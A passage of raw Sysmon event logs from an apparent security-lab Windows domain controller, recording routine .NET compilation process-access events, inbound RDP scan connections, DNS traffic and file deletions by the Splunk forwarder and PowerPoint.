14:58:47.825{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-DB0E-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.810{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-DB0E-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.810{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-DB0E-00000000BB01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.778{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-DA0E-00000000BB01}6300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.763{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-DA0E-00000000BB01}6300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.763{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-DA0E-00000000BB01}6300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.731{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D90E-00000000BB01}1144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.716{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D90E-00000000BB01}1144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.716{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D90E-00000000BB01}1144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D80E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.685{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D80E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.685{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D80E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.622{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D70E-00000000BB01}6320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.606{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D70E-00000000BB01}6320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.606{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D70E-00000000BB01}6320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.377{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-43093-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:46.320{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com65418-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.531{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64715- 354300x800000000000000080808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:45.501{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local64715- 10341000x800000000000000080807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.575{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D60E-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.560{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D60E-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.560{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D60E-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.513{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC27-607E-D50E-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.497{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC27-607E-D50E-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.497{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC27-607E-D50E-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.450{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CDF653B07912A2B2A2FD625FC5E3BB50,SHA256=3B2DDB85FC73079A4EE2CC0967128B4CE214DBC8424FD730595725EF56F9F264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.435{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\powerpnt.exe.db-journalMD5=3D269C81F6CA36F2FEB7BAF0B7AFA22D,SHA256=AD865A59E00624DD625E1769ACD336FF9A411267E2351CB91AD563B2BED01B34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:47.419{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft 